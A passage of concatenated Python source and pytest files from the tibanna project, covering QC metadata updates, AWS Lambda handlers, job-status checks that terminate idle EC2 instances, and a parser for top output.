updater._metadata["GAPFI6IZ585N"] = {"accession": "GAPFI6IZ585N"} # no quality_metric field
with mock.patch("tibanna_ffcommon.qc.read_s3_data"):
with mock.patch("tibanna_ffcommon.qc.QCDataParser.parse_qc_json", return_value=fake_parsed_qc_json):
with mock.patch("tibanna_ffcommon.qc.QCDataParser.parse_qc_table", return_value=fake_parsed_qc_table):
updater.update_qc()
assert updater.post_items
assert 'quality_metric_qclist' in updater.post_items
assert 'quality_metric_cmphet' in updater.post_items
assert 'quality_metric_vcfcheck' in updater.post_items
logger.debug("post_items[quality_metric_qclist]=" + str(updater.post_items['quality_metric_qclist']))
qclist_uuid = list(updater.post_items['quality_metric_qclist'].keys())[0]
assert 'qc_list' in updater.post_items['quality_metric_qclist'][qclist_uuid]
assert len(updater.post_items['quality_metric_qclist'][qclist_uuid]['qc_list']) == 2
assert updater.post_items['quality_metric_qclist'][qclist_uuid]['project'] == DEFAULT_PROJECT
assert updater.post_items['quality_metric_qclist'][qclist_uuid]['institution'] == DEFAULT_INSTITUTION
@valid_env
def test_cmphet_custom_qc_fields(update_ffmeta_event_data_cmphet):
update_ffmeta_event_data_cmphet['custom_qc_fields'] = {
'project': '/projects/test/',
'institution': '/institutions/test/'
}
updater = FourfrontUpdater(**update_ffmeta_event_data_cmphet)
fake_parsed_qc_json = {"by_genes":[{"name": "ENSG00000007047"}]}
fake_parsed_qc_table = {"check": "OK"}
updater._metadata["GAPFI6IZ585N"] = {"accession": "GAPFI6IZ585N"} # no quality_metric field
with mock.patch("tibanna_ffcommon.qc.read_s3_data"):
with mock.patch("tibanna_ffcommon.qc.QCDataParser.parse_qc_json", return_value=fake_parsed_qc_json):
with mock.patch("tibanna_ffcommon.qc.QCDataParser.parse_qc_table", return_value=fake_parsed_qc_table):
updater.update_qc()
assert updater.post_items
assert 'quality_metric_qclist' in updater.post_items
assert 'quality_metric_cmphet' in updater.post_items
assert 'quality_metric_vcfcheck' in updater.post_items
logger.debug("post_items[quality_metric_qclist]=" + str(updater.post_items['quality_metric_qclist']))
qclist_uuid = list(updater.post_items['quality_metric_qclist'].keys())[0]
assert 'qc_list' in updater.post_items['quality_metric_qclist'][qclist_uuid]
assert len(updater.post_items['quality_metric_qclist'][qclist_uuid]['qc_list']) == 2
# custom_qc_fields does not apply to qclist
assert updater.post_items['quality_metric_qclist'][qclist_uuid]['project'] == DEFAULT_PROJECT
assert updater.post_items['quality_metric_qclist'][qclist_uuid]['institution'] == DEFAULT_INSTITUTION
qc_cmphet_uuid = list(updater.post_items['quality_metric_cmphet'].keys())[0]
qc_vcfcheck_uuid = list(updater.post_items['quality_metric_vcfcheck'].keys())[0]
assert updater.post_items['quality_metric_cmphet'][qc_cmphet_uuid]['project'] == "/projects/test/"
assert updater.post_items['quality_metric_cmphet'][qc_cmphet_uuid]['institution'] == "/institutions/test/"
assert updater.post_items['quality_metric_vcfcheck'][qc_vcfcheck_uuid]['project'] == "/projects/test/"
assert updater.post_items['quality_metric_vcfcheck'][qc_vcfcheck_uuid]['institution'] == "/institutions/test/"
@valid_env
def test_cmphet_common_fields(update_ffmeta_event_data_cmphet):
update_ffmeta_event_data_cmphet['common_fields'] = {
'project': '/projects/test/',
'institution': '/institutions/test/'
}
updater = FourfrontUpdater(**update_ffmeta_event_data_cmphet)
fake_parsed_qc_json = {"by_genes":[{"name": "ENSG00000007047"}]}
fake_parsed_qc_table = {"check": "OK"}
updater._metadata["GAPFI6IZ585N"] = {"accession": "GAPFI6IZ585N"} # no quality_metric field
with mock.patch("tibanna_ffcommon.qc.read_s3_data"):
with mock.patch("tibanna_ffcommon.qc.QCDataParser.parse_qc_json", return_value=fake_parsed_qc_json):
with mock.patch("tibanna_ffcommon.qc.QCDataParser.parse_qc_table", return_value=fake_parsed_qc_table):
updater.update_qc()
assert updater.post_items
assert 'quality_metric_qclist' in updater.post_items
assert 'quality_metric_cmphet' in updater.post_items
assert 'quality_metric_vcfcheck' in updater.post_items
logger.debug("post_items[quality_metric_qclist]=" + str(updater.post_items['quality_metric_qclist']))
qclist_uuid = list(updater.post_items['quality_metric_qclist'].keys())[0]
assert 'qc_list' in updater.post_items['quality_metric_qclist'][qclist_uuid]
assert len(updater.post_items['quality_metric_qclist'][qclist_uuid]['qc_list']) == 2
# common fields do apply to qclist
assert updater.post_items['quality_metric_qclist'][qclist_uuid]['project'] == "/projects/test/"
assert updater.post_items['quality_metric_qclist'][qclist_uuid]['institution'] == "/institutions/test/"
qc_cmphet_uuid = list(updater.post_items['quality_metric_cmphet'].keys())[0]
qc_vcfcheck_uuid = list(updater.post_items['quality_metric_vcfcheck'].keys())[0]
assert updater.post_items['quality_metric_cmphet'][qc_cmphet_uuid]['project'] == "/projects/test/"
assert updater.post_items['quality_metric_cmphet'][qc_cmphet_uuid]['institution'] == "/institutions/test/"
assert updater.post_items['quality_metric_vcfcheck'][qc_vcfcheck_uuid]['project'] == "/projects/test/"
assert updater.post_items['quality_metric_vcfcheck'][qc_vcfcheck_uuid]['institution'] == "/institutions/test/"
@valid_env
def test_md5_common_fields(start_run_event_md5):
start_run_event_md5['common_fields'] = {
'project': '/projects/test/',
'institution': '/institutions/test/'
}
starter = FourfrontStarter(**start_run_event_md5)
# common fields apply to wfr (ff)
starter.create_ff()
assert starter.ff.project == '/projects/test/'
assert starter.ff.institution == '/institutions/test/'
@valid_env
def test_md5_wfr_meta_common_fields(start_run_event_md5):
start_run_event_md5['common_fields'] = {
'project': '/projects/test/',
'institution': '/institutions/test/'
}
start_run_event_md5['wfr_meta'] = {
'project': '/projects/test2/',
'institution': '/institutions/test2/'
}
starter = FourfrontStarter(**start_run_event_md5)
# common fields apply to wfr (ff)
starter.create_ff()
assert starter.ff.project == '/projects/test2/' # wfr_meta overwrites common_fields
assert starter.ff.institution == '/institutions/test2/' # wfr_meta overwrites common_fields
```
#### File: tibanna_ff/tibanna_4dn/core.py
```python
from tibanna_ffcommon.core import API as _API
from .stepfunction import StepFunctionPony
from .stepfunction_cost_updater import StepFunctionCostUpdater
from .vars import (
TIBANNA_DEFAULT_STEP_FUNCTION_NAME,
LAMBDA_TYPE,
IAM_BUCKETS,
DEV_ENV,
PROD_ENV
)
class API(_API):
# This one cannot be imported in advance, because it causes circular import.
# lambdas run_workflow / validate_md5_s3_initiator needs to import this API
# to call run_workflow
@property
def lambdas_module(self):
from . import lambdas as pony_lambdas
return pony_lambdas
@property
def tibanna_packages(self):
import tibanna
import tibanna_ffcommon
import tibanna_4dn
return [tibanna, tibanna_ffcommon, tibanna_4dn]
StepFunction = StepFunctionPony
StepFunctionCU = StepFunctionCostUpdater
default_stepfunction_name = TIBANNA_DEFAULT_STEP_FUNCTION_NAME
default_env = DEV_ENV
sfn_type = LAMBDA_TYPE
lambda_type = LAMBDA_TYPE
@property
def IAM(self):
from .iam_utils import IAM
return IAM
def __init__(self):
pass
def deploy_core(self, name, suffix=None, usergroup='', subnets=None, security_groups=None,
env=None, quiet=False):
if env:
usergroup = env + '_' + usergroup if usergroup else env
else:
if usergroup:
env = DEV_ENV
else:
env = PROD_ENV
super().deploy_core(name=name, suffix=suffix, usergroup=usergroup, subnets=subnets,
security_groups=security_groups, quiet=quiet)
def deploy_pony(self, suffix=None, usergroup='', subnets=None, security_groups=None, env=None, deploy_costupdater=True):
if env:
usergroup = env + '_' + usergroup if usergroup else env
else:
if usergroup:
env = DEV_ENV
else:
env = PROD_ENV
self.deploy_tibanna(suffix=suffix, usergroup=usergroup, setup=True, default_usergroup_tag='',
do_not_delete_public_access_block=True, no_randomize=True,
buckets=','.join(IAM_BUCKETS(env)), deploy_costupdater=deploy_costupdater,
subnets=subnets, security_groups=security_groups)
```
#### File: tibanna_ff/tibanna_4dn/update_ffmeta.py
```python
import copy
from .pony_utils import FourfrontUpdater
from tibanna import create_logger
logger = create_logger(__name__)
def update_ffmeta(input_json):
"""Check output and update fourfront metadata"""
input_json_copy = copy.deepcopy(input_json)
# metadata-only info may be in 'metadat_only' or in 'config'->'runmode'->'metadata_only'
# if metadata_only is True, that means the job did not actually run - we're creating/updating metadata
# as if the job has run.
if not input_json_copy.get('metadata_only', False):
input_json_copy['metadata_only'] = input_json_copy['config'].get('runmode', {}).get('metadata_only', False)
# actual metadata update
logger.info("creating FourfrontUpdater object")
try:
updater = FourfrontUpdater(**input_json_copy)
except Exception as e:
logger.error("error creating FourfrontUpdater: %s" % str(e))
raise e
logger.info("checking error")
if input_json_copy.get('error', False):
logger.info("got error from earlier step, calling handle_error")
updater.handle_error(input_json_copy['error'])
try:
updater.update_metadata()
except Exception as e:
updater.handle_error(str(e))
# lambda output
input_json_copy['ff_meta'] = updater.ff_meta.as_dict()
input_json_copy['pf_meta'] = [v.as_dict() for _, v in updater.pf_output_files.items()]
return input_json_copy
```
#### File: tibanna_cgap/lambdas/start_run.py
```python
from tibanna_ffcommon.exceptions import exception_coordinator
from tibanna_cgap.start_run import start_run
from tibanna_cgap.vars import AWS_REGION, LAMBDA_TYPE
config = {
'function_name': 'start_run_' + LAMBDA_TYPE,
'function_module': 'service',
'function_handler': 'handler',
'handler': 'service.handler',
'region': AWS_REGION,
'runtime': 'python3.6',
'role': 'lambda_full_s3',
'description': 'Tibanna zebra start_run',
'timeout': 300,
'memory_size': 256
}
def metadata_only(event):
# this relies on the fact that event contains and output key with output files
assert event['metadata_only']
assert event['output_files']
return real_handler(event, None)
@exception_coordinator('start_run', metadata_only)
def handler(event, context):
if event.get('push_error_to_end', True):
event['push_error_to_end'] = True # push error to end by default for pony
return real_handler(event, context)
def real_handler(event, context):
return start_run(event)
```
#### File: tibanna_cgap/lambdas/update_cost.py
```python
from tibanna.lambdas import update_cost_awsem as update_cost
from tibanna.lambdas.update_cost_awsem import config
from tibanna_ffcommon.exceptions import exception_coordinator
from tibanna_cgap.vars import LAMBDA_TYPE
config['function_name'] = 'update_cost_' + LAMBDA_TYPE
def handler(event, context):
return update_cost(event)
```
#### File: tibanna_ff/tibanna_cgap/start_run.py
```python
import boto3
import json
from .zebra_utils import FourfrontStarter
from tibanna import create_logger
logger = create_logger(__name__)
def start_run(input_json):
'''
this is generic function to run awsem workflow
based on the data passed in
workflow_uuid : for now, pass this on. Later we can add a code to automatically retrieve this from app_name.
Note multiple workflow_uuids can be available for an app_name
(different versions of the same app could have a different uuid)
'''
starter = FourfrontStarter(**input_json)
logger.debug("starter.inp.as_dict() = " + str(starter.inp.as_dict()))
if starter.inp.config.log_bucket and starter.inp.jobid:
s3 = boto3.client('s3')
s3.put_object(Body=json.dumps(input_json, indent=4).encode('ascii'),
Key=starter.inp.jobid + '.input.json',
Bucket=starter.inp.config.log_bucket)
starter.run()
return(starter.inp.as_dict())
```
#### File: tibanna_ff/tibanna_cgap/stepfunction.py
```python
from .vars import LAMBDA_TYPE
from tibanna_ffcommon.stepfunction import StepFunctionFFAbstract
class StepFunctionZebra(StepFunctionFFAbstract):
@property
def lambda_type(self):
return LAMBDA_TYPE
@property
def iam(self):
from .iam_utils import IAM
return IAM(self.usergroup)
```
#### File: tibanna_ff/tibanna_ffcommon/exceptions.py
```python
from tibanna import create_logger
from tibanna.exceptions import *
import traceback
logger = create_logger(__name__)
class TibannaStartException(Exception):
"""Error connecting to get the access key from s3"""
pass
class FdnConnectionException(Exception):
"""There is an error connecting to the 4DN portal"""
pass
class MalFormattedFFInputException(Exception):
"""There is an error with pony/zebra input json format"""
pass
class MalFormattedWorkflowMetadataException(Exception):
"""There is an error with pony/zebra workflow metadata"""
pass
def exception_coordinator(lambda_name, metadata_only_func):
'''
friendly wrapper for your lambda functions, based on input_json / event comming in...
1. Logs basic input for all functions
2. if 'skip' key == 'lambda_name', skip the function
3. catch exceptions raised by labmda, and if not in list of ignored exceptions, added
the exception to output json
4. 'metadata' only parameter, if set to true, just create metadata instead of run workflow
'''
def decorator(function):
ignored_exceptions = [EC2StartingException, StillRunningException,
TibannaStartException, FdnConnectionException,
DependencyStillRunningException, EC2InstanceLimitWaitException]
def wrapper(event, context):
if context:
logger.info("context= " + str(context))
logger.info(event)
if lambda_name in event.get('skip', []):
logger.info('skipping %s since skip was set in input_json' % lambda_name)
return event
elif event.get('push_error_to_end', False) and event.get('error', False) \
and lambda_name != 'update_ffmeta':
logger.info('skipping %s since a value for "error" is in input json '
'and lambda is not update_ffmeta_awsem' % lambda_name)
return event
elif event.get('metadata_only', False):
return metadata_only_func(event)
# else
try:
return function(event, context)
except Exception as e:
if type(e) in ignored_exceptions:
raise e
# update ff_meta to error status
elif lambda_name == 'update_ffmeta':
# for last step just pit out error
if 'error' in event:
error_msg = "error from earlier step: %s" % event["error"]
else:
error_msg = "error from update_ffmeta: %s." % str(e) + \
"Full traceback: %s" % traceback.format_exc()
raise Exception(error_msg)
elif not event.get('push_error_to_end', False):
raise e
# else
if e.__class__ == AWSEMJobErrorException:
error_msg = 'Error on step: %s: %s' % (lambda_name, str(e))
elif e.__class__ == EC2UnintendedTerminationException:
error_msg = 'EC2 unintended termination error on step: %s: %s' % (lambda_name, str(e))
elif e.__class__ == EC2IdleException:
error_msg = 'EC2 Idle error on step: %s: %s' % (lambda_name, str(e))
elif e.__class__ == JobAbortedException:
error_msg = 'Job Aborted'
else:
error_msg = 'Error on step: %s. Full traceback: %s' % (lambda_name, traceback.format_exc())
event['error'] = error_msg
logger.info(error_msg)
return event
return wrapper
return decorator
```
#### File: tibanna_ff/tibanna_ffcommon/file_format.py
```python
from dcicutils.ff_utils import (
search_metadata,
)
from tibanna import create_logger
logger = create_logger(__name__)
class FormatExtensionMap(object):
def __init__(self, ff_keys=None, ffe_all=None):
"""connect to the server and get all fileformat search result if ff_keys
if given. If not, use user-specified ffe_all
"""
if not ff_keys and not ffe_all:
raise Exception("Either ff_keys or ffe_all must be specified" + \
"to create a FormatExtensionMap object")
if ff_keys and ffe_all:
raise Exception("Either ff_keys or ffe_all must be specified but not both" + \
"to create a FormatExtensionMap object")
if ff_keys and not ffe_all:
try:
logger.debug("Searching in server : " + ff_keys['server'])
ffe_all = search_metadata("/search/?type=FileFormat&frame=object", key=ff_keys)
except Exception as e:
raise Exception("Can't get the list of FileFormat objects. %s\n" % e)
self.fe_dict = dict()
logger.debug("**ffe_all = " + str(ffe_all))
for k in ffe_all:
file_format = k['file_format']
self.fe_dict[file_format] = \
{'standard_extension': k['standard_file_extension'],
'other_allowed_extensions': k.get('other_allowed_extensions', []),
'extrafile_formats': k.get('extrafile_formats', [])
}
def get_extension(self, file_format):
if file_format in self.fe_dict:
return self.fe_dict[file_format]['standard_extension']
else:
return None
def get_other_extensions(self, file_format):
if file_format in self.fe_dict:
return self.fe_dict[file_format]['other_allowed_extensions']
else:
return []
def parse_formatstr(file_format_str):
if not file_format_str:
return None
return file_format_str.replace('/file-formats/', '').replace('/', '')
def cmp_fileformat(format1, format2):
return parse_formatstr(format1) == parse_formatstr(format2)
``` |
{
"source": "4dn-dcic/tibanna",
"score": 2
} |
#### File: unicorn/check_task_awsem/test_handler.py
```python
from tibanna.lambdas import check_task_awsem as service
from tibanna.exceptions import (
EC2StartingException,
StillRunningException,
MetricRetrievalException,
EC2IdleException,
JobAbortedException
)
import pytest
import boto3
import random
import string
import json
from datetime import datetime, timedelta
from dateutil.tz import tzutc
from tibanna.vars import AWSEM_TIME_STAMP_FORMAT
@pytest.fixture()
def check_task_input():
return {"config": {"log_bucket": "tibanna-output"},
"jobid": "test_job",
"push_error_to_end": True
}
@pytest.fixture()
def s3(check_task_input):
bucket_name = check_task_input['config']['log_bucket']
return boto3.resource('s3').Bucket(bucket_name)
@pytest.mark.webtest
def test_check_task_awsem_fails_if_no_job_started(check_task_input, s3):
# ensure there is no job started
jobid = 'notmyjobid'
check_task_input_modified = check_task_input
check_task_input_modified['jobid'] = jobid
check_task_input_modified['config']['start_time'] = datetime.strftime(datetime.now(tzutc()) - timedelta(minutes=4),
AWSEM_TIME_STAMP_FORMAT)
job_started = "%s.job_started" % jobid
s3.delete_objects(Delete={'Objects': [{'Key': job_started}]})
with pytest.raises(EC2StartingException) as excinfo:
service.handler(check_task_input_modified, '')
assert 'Failed to find jobid' in str(excinfo.value)
@pytest.mark.webtest
def test_check_task_awsem_fails_if_no_job_started_for_too_long(check_task_input, s3):
# ensure there is no job started
jobid = 'notmyjobid'
check_task_input_modified = check_task_input
check_task_input_modified['jobid'] = jobid
check_task_input_modified['config']['start_time'] = datetime.strftime(datetime.now(tzutc()) - timedelta(minutes=13),
AWSEM_TIME_STAMP_FORMAT)
job_started = "%s.job_started" % jobid
s3.delete_objects(Delete={'Objects': [{'Key': job_started}]})
with pytest.raises(EC2IdleException) as excinfo:
service.handler(check_task_input_modified, '')
assert 'Failed to find jobid' in str(excinfo.value)
def test_check_task_awsem_aborted(check_task_input, s3):
jobid = 'l<PASSWORD>'
check_task_input_modified = check_task_input
check_task_input_modified['jobid'] = jobid
job_started = "%s.job_started" % jobid
job_aborted = "%s.aborted" % jobid
s3.put_object(Body=b'', Key=job_started)
s3.put_object(Body=b'', Key=job_aborted)
with pytest.raises(JobAbortedException) as excinfo:
service.handler(check_task_input, '')
assert 'aborted' in str(excinfo.value)
# cleanup
s3.delete_objects(Delete={'Objects': [{'Key': job_started}]})
s3.delete_objects(Delete={'Objects': [{'Key': job_aborted}]})
@pytest.mark.webtest
def test_check_task_awsem_throws_exception_if_not_done(check_task_input):
with pytest.raises(StillRunningException) as excinfo:
service.handler(check_task_input, '')
assert 'still running' in str(excinfo.value)
assert 'error' not in check_task_input
@pytest.mark.webtest
def test_check_task_awsem(check_task_input, s3):
jobid = 'l<PASSWORD>'
check_task_input_modified = check_task_input
check_task_input_modified['jobid'] = jobid
job_started = "%s.job_started" % jobid
s3.put_object(Body=b'', Key=job_started)
job_success = "%s.success" % jobid
s3.put_object(Body=b'', Key=job_success)
postrunjson = "%s.postrun.json" % jobid
jsondict = {"config": {"log_bucket": "somelogbucket"},
"Job": {"JOBID": jobid, "start_time": '20190814-21:01:07-UTC',
"App": {}, "Output": {},
"Input": {'Input_files_data': {}, 'Input_parameters': {}, 'Secondary_files_data': {}}}}
jsoncontent = json.dumps(jsondict)
s3.put_object(Body=jsoncontent.encode(), Key=postrunjson)
with pytest.raises(MetricRetrievalException) as excinfo:
retval = service.handler(check_task_input_modified, '')
assert 'error getting metrics' in str(excinfo.value)
s3.delete_objects(Delete={'Objects': [{'Key': job_started}]})
s3.delete_objects(Delete={'Objects': [{'Key': job_success}]})
s3.delete_objects(Delete={'Objects': [{'Key': postrunjson}]})
#assert 'postrunjson' in retval
#assert retval['postrunjson'] == jsondict
#del retval['postrunjson']
#assert retval == check_task_input_modified
@pytest.mark.webtest
def test_check_task_awsem_with_long_postrunjson(check_task_input, s3):
jobid = 'some_uniq_jobid'
check_task_input_modified = check_task_input
check_task_input_modified['jobid'] = jobid
job_started = "%s.job_started" % jobid
s3.put_object(Body=b'', Key=job_started)
job_success = "%s.success" % jobid
s3.put_object(Body=b'', Key=job_success)
postrunjson = "%s.postrun.json" % jobid
verylongstring = ''.join(random.choice(string.ascii_uppercase) for _ in range(50000))
jsondict = {"config": {"log_bucket": "somelogbucket"},
"Job": {"JOBID": jobid, "start_time": '20190814-21:01:07-UTC',
"App": {}, "Output": {},
"Input": {'Input_files_data': {}, 'Input_parameters': {}, 'Secondary_files_data': {}}},
"commands": verylongstring}
jsoncontent = json.dumps(jsondict)
s3.put_object(Body=jsoncontent.encode(), Key=postrunjson)
with pytest.raises(MetricRetrievalException) as excinfo:
retval = service.handler(check_task_input_modified, '')
assert 'error getting metrics' in str(excinfo.value)
s3.delete_objects(Delete={'Objects': [{'Key': job_started}]})
s3.delete_objects(Delete={'Objects': [{'Key': job_success}]})
s3.delete_objects(Delete={'Objects': [{'Key': postrunjson}]})
#assert 'postrunjson' in retval
#assert 'Job' in retval['postrunjson']
#assert 'Output' in retval['postrunjson']['Job']
#assert 'log' in retval['postrunjson']
#assert retval['postrunjson']['log'] == "postrun json not included due to data size limit"
#del retval['postrunjson']
#assert retval == check_task_input_modified
```
#### File: tibanna/tibanna/check_task.py
```python
import boto3
import json
import copy
from . import create_logger
from .cw_utils import TibannaResource
from datetime import datetime, timedelta
from dateutil.tz import tzutc
from .utils import (
does_key_exist,
read_s3
)
from .awsem import (
AwsemPostRunJson
)
from .exceptions import (
StillRunningException,
EC2StartingException,
AWSEMJobErrorException,
EC2UnintendedTerminationException,
EC2IdleException,
MetricRetrievalException,
JobAbortedException,
AWSEMErrorHandler
)
from .vars import PARSE_AWSEM_TIME, AWSEM_TIME_STAMP_FORMAT
from .core import API
RESPONSE_JSON_CONTENT_INCLUSION_LIMIT = 30000 # strictly it is 32,768 but just to be safe.
logger = create_logger(__name__)
def check_task(input_json):
return CheckTask(input_json).run()
class CheckTask(object):
TibannaResource = TibannaResource
API = API
def __init__(self, input_json):
self.input_json = copy.deepcopy(input_json)
def run(self):
# s3 bucket that stores the output
bucket_name = self.input_json['config']['log_bucket']
instance_id = self.input_json['config'].get('instance_id', '')
# info about the jobby job
jobid = self.input_json['jobid']
job_started = "%s.job_started" % jobid
job_success = "%s.success" % jobid
job_error = "%s.error" % jobid
job_aborted = "%s.aborted" % jobid
public_postrun_json = self.input_json['config'].get('public_postrun_json', False)
# check to see ensure this job has started else fail
if not does_key_exist(bucket_name, job_started):
start_time = PARSE_AWSEM_TIME(self.input_json['config']['start_time'])
now = datetime.now(tzutc())
# terminate the instance if EC2 is not booting for more than 10 min.
if start_time + timedelta(minutes=10) < now:
try:
boto3.client('ec2').terminate_instances(InstanceIds=[instance_id])
self.handle_postrun_json(bucket_name, jobid, self.input_json, public_read=public_postrun_json)
except:
pass # most likely already terminated or never initiated
raise EC2IdleException("Failed to find jobid %s, ec2 is not initializing for too long. Terminating the instance." % jobid)
raise EC2StartingException("Failed to find jobid %s, ec2 is probably still booting" % jobid)
# check to see if job has been aborted (by user or admin)
if does_key_exist(bucket_name, job_aborted):
try:
self.handle_postrun_json(bucket_name, jobid, self.input_json, public_read=public_postrun_json)
except Exception as e:
logger.warning("error occurred while handling postrun json but continuing. %s" % str(e))
raise JobAbortedException("job aborted")
# check to see if job has error, report if so
if does_key_exist(bucket_name, job_error):
try:
self.handle_postrun_json(bucket_name, jobid, self.input_json, public_read=public_postrun_json)
except Exception as e:
logger.warning("error occurred while handling postrun json but continuing. %s" % str(e))
eh = AWSEMErrorHandler()
if 'custom_errors' in self.input_json['args']:
eh.add_custom_errors(self.input_json['args']['custom_errors'])
log = self.API().log(job_id=jobid, logbucket=bucket_name)
ex = eh.parse_log(log)
if ex:
msg_aug = str(ex) + ". For more info - " + eh.general_awsem_check_log_msg(jobid)
raise AWSEMJobErrorException(msg_aug)
else:
raise AWSEMJobErrorException(eh.general_awsem_error_msg(jobid))
# check to see if job has completed
if does_key_exist(bucket_name, job_success):
self.handle_postrun_json(bucket_name, jobid, self.input_json, public_read=public_postrun_json)
print("completed successfully")
return self.input_json
# checking if instance is terminated for no reason
if instance_id: # skip test for instance_id by not giving it to self.input_json
try:
res = boto3.client('ec2').describe_instances(InstanceIds=[instance_id])
except Exception as e:
if 'InvalidInstanceID.NotFound' in str(e):
self.handle_postrun_json(bucket_name, jobid, self.input_json, public_read=public_postrun_json) # We need to record the end time
raise EC2UnintendedTerminationException("EC2 is no longer found for job %s - please rerun." % jobid)
else:
raise e
if not res['Reservations']:
self.handle_postrun_json(bucket_name, jobid, self.input_json, public_read=public_postrun_json) # We need to record the end time
raise EC2UnintendedTerminationException("EC2 is no longer found for job %s - please rerun." % jobid)
else:
ec2_state = res['Reservations'][0]['Instances'][0]['State']['Name']
if ec2_state in ['stopped', 'shutting-down', 'terminated']:
errmsg = "EC2 is terminated unintendedly for job %s - please rerun." % jobid
logger.error(errmsg)
self.handle_postrun_json(bucket_name, jobid, self.input_json, public_read=public_postrun_json) # We need to record the end time
raise EC2UnintendedTerminationException(errmsg)
# check CPU utilization for the past hour
filesystem = '/dev/nvme1n1' # doesn't matter for cpu utilization
end = datetime.now(tzutc())
start = end - timedelta(hours=1)
jobstart_time = boto3.client('s3').get_object(Bucket=bucket_name, Key=job_started).get('LastModified')
if jobstart_time + timedelta(hours=1) < end:
try:
cw_res = self.TibannaResource(instance_id, filesystem, start, end).as_dict()
except Exception as e:
raise MetricRetrievalException(e)
if 'max_cpu_utilization_percent' in cw_res:
self.terminate_idle_instance(jobid,
instance_id,
cw_res['max_cpu_utilization_percent'],
cw_res['max_ebs_read_bytes'])
# if none of the above
raise StillRunningException("job %s still running" % jobid)
def terminate_idle_instance(self, jobid, instance_id, cpu, ebs_read):
if not cpu or cpu < 1.0:
# the instance wasn't terminated - otherwise it would have been captured in the previous error.
if not ebs_read or ebs_read < 1000: # minimum 1kb
# in case the instance is copying files using <1% cpu for more than 1hr, do not terminate it.
try:
bucket_name = self.input_json['config']['log_bucket']
public_postrun_json = self.input_json['config'].get('public_postrun_json', False)
self.handle_postrun_json(bucket_name, jobid, self.input_json, public_read=public_postrun_json) # We need to record the end time
boto3.client('ec2').terminate_instances(InstanceIds=[instance_id])
errmsg = (
"Nothing has been running for the past hour for job %s,"
"(CPU utilization %s and EBS read %s bytes)."
) % (jobid, str(cpu), str(ebs_read))
raise EC2IdleException(errmsg)
except Exception as e:
errmsg = (
"Nothing has been running for the past hour for job %s,"
"but cannot terminate the instance - cpu utilization (%s) : %s"
) % (jobid, str(cpu), str(e))
logger.error(errmsg)
raise EC2IdleException(errmsg)
def handle_postrun_json(self, bucket_name, jobid, input_json, public_read=False):
postrunjson = "%s.postrun.json" % jobid
if not does_key_exist(bucket_name, postrunjson):
postrunjson_location = "https://s3.amazonaws.com/%s/%s" % (bucket_name, postrunjson)
raise Exception("Postrun json not found at %s" % postrunjson_location)
postrunjsoncontent = json.loads(read_s3(bucket_name, postrunjson))
prj = AwsemPostRunJson(**postrunjsoncontent)
prj.Job.update(instance_id=input_json['config'].get('instance_id', ''))
prj.Job.update(end_time=datetime.now(tzutc()).strftime(AWSEM_TIME_STAMP_FORMAT))
self.handle_metrics(prj)
logger.debug("inside funtion handle_postrun_json")
logger.debug("content=\n" + json.dumps(prj.as_dict(), indent=4))
# upload postrun json file back to s3
acl = 'public-read' if public_read else 'private'
try:
boto3.client('s3').put_object(Bucket=bucket_name, Key=postrunjson, ACL=acl,
Body=json.dumps(prj.as_dict(), indent=4).encode())
except Exception as e:
boto3.client('s3').put_object(Bucket=bucket_name, Key=postrunjson, ACL='private',
Body=json.dumps(prj.as_dict(), indent=4).encode())
except Exception as e:
raise "error in updating postrunjson %s" % str(e)
# add postrun json to the input json
self.add_postrun_json(prj, input_json, RESPONSE_JSON_CONTENT_INCLUSION_LIMIT)
def add_postrun_json(self, prj, input_json, limit):
prjd = prj.as_dict()
if len(str(prjd)) + len(str(input_json)) < limit:
input_json['postrunjson'] = prjd
else:
if 'commands' in prjd:
del prjd['commands']
if len(str(prjd)) + len(str(input_json)) < limit:
prjd['log'] = 'postrun json not included due to data size limit'
input_json['postrunjson'] = prjd
else:
input_json['postrunjson'] = {'log': 'postrun json not included due to data size limit'}
def handle_metrics(self, prj):
try:
resources = self.TibannaResource(prj.Job.instance_id,
prj.Job.filesystem,
prj.Job.start_time_as_datetime,
prj.Job.end_time_as_datetime)
except Exception as e:
raise MetricRetrievalException("error getting metrics: %s" % str(e))
prj.Job.update(Metrics=resources.as_dict())
self.API().plot_metrics(prj.Job.JOBID, directory='/tmp/tibanna_metrics/',
force_upload=True, open_browser=False,
endtime=prj.Job.end_time_as_datetime,
filesystem=prj.Job.filesystem,
instance_id=prj.Job.instance_id)
```
#### File: tibanna/tibanna/top.py
```python
import datetime
class Top(object):
"""class TopSeries stores the information of a series of top commands
::
echo -n 'Timestamp: '; date +%F-%H:%M:%S
top -b -n1 [-i] [-c]
over short intervals to monitor the same set of processes over time.
An example input content looks like below, or a series of these.
The initialization works at any time interval and can be used as a generic
class, but the class is designed for the output of a regular top commands above
run at about 1-minute intervals, which is performed by awsf3 on an AWSEM instance
through cron jobs. (some can be skipped but there should be no more than 1 per minute).
This top output can be obtained through ``tibanna log -j <job_id> -t`` or through
API ``API().log(job_id=<job_id>, top=True)``.
::
Timestamp: 2020-12-18-18:55:37
top - 18:55:37 up 4 days, 2:37, 0 users, load average: 5.59, 5.28, 5.76
Tasks: 7 total, 1 running, 6 sleeping, 0 stopped, 0 zombie
%Cpu(s): 6.6 us, 0.1 sy, 0.0 ni, 93.2 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem : 12971188+total, 10379019+free, 20613644 used, 5308056 buff/cache
KiB Swap: 0 total, 0 free, 0 used. 10834606+avail Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
712 root 20 0 36.464g 8.223g 19572 S 100.0 6.6 125:55.12 java -Xmx32g -Xms32g -jar juicer_tools.jar addNorm -w 1000 -d -F out.hic
17919 ubuntu 20 0 40676 3828 3144 R 6.2 0.0 0:00.01 top -b -n1 -c -i -w 10000
The default timestamp from top output does not contain dates, which can screw up multi-day processes
which is common for bioinformatics pipelines. So, an extra timestamp is added before each top command.
To parse top output content, simply create an object. This will create processes attribute,
which is a raw parsed result organized by time stamps.
::
top = Top(top_output_content)
To reorganize the contents by commands, run digest. By default, the max number of commands is 16,
and if there are more than 16 unique commands, they will be collapsed into prefixes.
::
top.digest()
To write a csv / tsv file organized by both timestamps (rows) and commands (columns),
use :func: write_to_csv.
::
top.write_to_csv(...)
"""
# assume this format for timestamp
timestamp_format = '%Y-%m-%d-%H:%M:%S'
# These commands are excluded when parsing the top output
# Currently only 1-, 2- or 3-word prefixes work.
exclude_list = ['top', 'docker', 'dockerd', '/usr/bin/dockerd', 'cron',
'docker-untar', 'containerd', 'goofys-latest', 'cwltool',
